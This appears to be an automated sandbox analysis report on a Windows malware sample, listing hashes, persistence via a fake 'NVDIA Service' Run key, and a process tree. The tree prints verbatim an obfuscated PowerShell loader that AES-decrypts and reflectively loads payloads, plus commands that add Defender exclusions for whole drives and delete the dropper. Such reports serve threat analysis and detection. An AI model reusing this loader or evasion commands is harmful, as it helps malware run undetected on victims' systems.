Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
29-04-2023 05:51
Behavioral task
behavioral1
Sample
给老子冲/影流之王🈹 (10).exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
给老子冲/影流之王🈹 (10).exe
Resource
win10v2004-20230221-en
Behavioral task
behavioral3
Sample
给老子冲/影流之王🈹 (5).exe
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
给老子冲/影流之王🈹 (5).exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
给老子冲/影流之王🈹 (7).exe
Resource
win7-20230220-en
General
-
Target
给老子冲/影流之王🈹 (5).exe
-
Size
1.1MB
-
MD5
98e247275859543e4f338a906b7a0e2d
-
SHA1
cbc75272194f9b96719635e5a1ad347e8aaeb972
-
SHA256
c4318f631e8c30ff72114876c9fb3e435941b5bf18ab969c53c26483e5699eb8
-
SHA512
04cd9e7fd6f36ccdb4fb64ec86fa5c38d2997849f7330c63bf0db4286cea2a8588600afdec8a56ade39c0e718d5e235e762757295e0e745503ebbb147fde1d9a
-
SSDEEP
24576:G2Bf9f3u+9UjIS1Nl1JPSAqn4HuuwOBJM12nYELdGCLE:G27f3kFaA6intW
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
unsdk.bat.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation unsdk.bat.exe -
Executes dropped EXE 1 IoCs
Processes:
unsdk.bat.exepid process 716 unsdk.bat.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
影流之王🈹 (5).exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVDIA Service = "C:\\Users\\Admin\\AppData\\Local\\Temp\\给老子冲\\影流之王🈹 (5).exe" 影流之王🈹 (5).exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
影流之王🈹 (5).exeunsdk.bat.exepowershell.exepowershell.exepid process 3676 影流之王🈹 (5).exe 3676 影流之王🈹 (5).exe 716 unsdk.bat.exe 716 unsdk.bat.exe 5108 powershell.exe 1848 powershell.exe 1848 powershell.exe 5108 powershell.exe 1848 powershell.exe 1848 powershell.exe 716 unsdk.bat.exe 3676 影流之王🈹 (5).exe 3676 影流之王🈹 (5).exe 3676 影流之王🈹 (5).exe 3676 影流之王🈹 (5).exe 3676 影流之王🈹 (5).exe 3676 影流之王🈹 (5).exe 3676 影流之王🈹 (5).exe 3676 影流之王🈹 (5).exe 3676 影流之王🈹 (5).exe 3676 影流之王🈹 (5).exe 3676 影流之王🈹 (5).exe 3676 影流之王🈹 (5).exe 3676 影流之王🈹 (5).exe 3676 影流之王🈹 (5).exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
影流之王🈹 (5).exeunsdk.bat.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3676 影流之王🈹 (5).exe Token: SeDebugPrivilege 716 unsdk.bat.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeDebugPrivilege 1848 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
影流之王🈹 (5).execmd.execmd.exeunsdk.bat.exedescription pid process target process PID 3676 wrote to memory of 1900 3676 影流之王🈹 (5).exe cmd.exe PID 3676 wrote to memory of 1900 3676 影流之王🈹 (5).exe cmd.exe PID 1900 wrote to memory of 3872 1900 cmd.exe cmd.exe PID 1900 wrote to memory of 3872 1900 cmd.exe cmd.exe PID 3872 wrote to memory of 716 3872 cmd.exe unsdk.bat.exe PID 3872 wrote to memory of 716 3872 cmd.exe unsdk.bat.exe PID 716 wrote to memory of 1848 716 unsdk.bat.exe powershell.exe PID 716 wrote to memory of 1848 716 unsdk.bat.exe powershell.exe PID 716 wrote to memory of 5108 716 unsdk.bat.exe powershell.exe PID 716 wrote to memory of 5108 716 unsdk.bat.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\给老子冲\影流之王🈹 (5).exe"C:\Users\Admin\AppData\Local\Temp\给老子冲\影流之王🈹 (5).exe"1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\koodos40\unsdk.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\koodos40\unsdk.bat3⤵
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Users\Admin\AppData\Roaming\koodos40\unsdk.bat.exe"C:\Users\Admin\AppData\Roaming\koodos40\unsdk.bat.exe" -w hidden -c $YEEK='GCVLietCVLiCCVLiurreCVLinCVLitCVLiProCVLicesCVLisCVLi'.Replace('CVLi', '');$POMR='LoCVLiadCVLi'.Replace('CVLi', '');$AGNg='TCVLirCVLiansfCVLioCVLirmCVLiFinaCVLilBCVLilocCVLikCVLi'.Replace('CVLi', '');$plSj='SplCVLiitCVLi'.Replace('CVLi', '');$vQEn='FrCVLioCVLimBCVLiaCVLiseCVLi64SCVLitCVLirinCVLigCVLi'.Replace('CVLi', '');$XaVM='InvCVLiokCVLieCVLi'.Replace('CVLi', '');$wVKZ='ChCVLiangCVLieCVLiExCVLitCVLienCVLisionCVLi'.Replace('CVLi', '');$wHeU='FiCVLirstCVLi'.Replace('CVLi', '');$hLUz='MaiCVLinMCVLiodCVLiuleCVLi'.Replace('CVLi', '');$WUIc='EnCVLitryCVLiPoCVLiinCVLitCVLi'.Replace('CVLi', '');$alFu='ReCVLiaCVLidCVLiLinCVLiesCVLi'.Replace('CVLi', '');$ByBm='CCVLireCVLiaCVLiteCVLiDeCVLicrCVLiyCVLiptorCVLi'.Replace('CVLi', '');function ewixP($AAaRe){$omicA=[System.Security.Cryptography.Aes]::Create();$omicA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$omicA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$omicA.Key=[System.Convert]::$vQEn('XD+9NVavP36xq+/eONlCELUYPWiNze3ftFux/SslCWE=');$omicA.IV=[System.Convert]::$vQEn('vTnI2Q4cYpsFZdMCUt5nXQ==');$zwRBV=$omicA.$ByBm();$oJPPd=$zwRBV.$AGNg($AAaRe,0,$AAaRe.Length);$zwRBV.Dispose();$omicA.Dispose();$oJPPd;}function jlGEQ($AAaRe){$qlsEE=New-Object System.IO.MemoryStream(,$AAaRe);$hzoPC=New-Object System.IO.MemoryStream;$ICTKK=New-Object System.IO.Compression.GZipStream($qlsEE,[IO.Compression.CompressionMode]::Decompress);$ICTKK.CopyTo($hzoPC);$ICTKK.Dispose();$qlsEE.Dispose();$hzoPC.Dispose();$hzoPC.ToArray();}$UsbMc=[System.Linq.Enumerable]::$wHeU([System.IO.File]::$alFu([System.IO.Path]::$wVKZ([System.Diagnostics.Process]::$YEEK().$hLUz.FileName, $null)));$BCmrp=$UsbMc.Substring(3).$plSj(':');$KaFHq=jlGEQ (ewixP ([Convert]::$vQEn($BCmrp[0])));$GjXDD=jlGEQ (ewixP ([Convert]::$vQEn($BCmrp[1])));[System.Reflection.Assembly]::$POMR([byte[]]$GjXDD).$WUIc.$XaVM($null,$null);[System.Reflection.Assembly]::$POMR([byte[]]$KaFHq).$WUIc.$XaVM($null,$null);4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(716);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5108
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
487KB
MD5bb6a0d80de3dd26795653ec1bc7eac1a
SHA153a7368181af6191d282b59954c3fbbdcdb4f257
SHA256e55f25f0d19246b03cbaa4ab860917629f681450d19eae7e7dd1fb593e85a93c
SHA51275fed7438425480912c9f75695388f0b8a7135d4be783e8def9c482fd4467c99d811cf298e7e9f92d3de7a25edb76eb262eab42039cac5c0613b9a79357e4c69
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b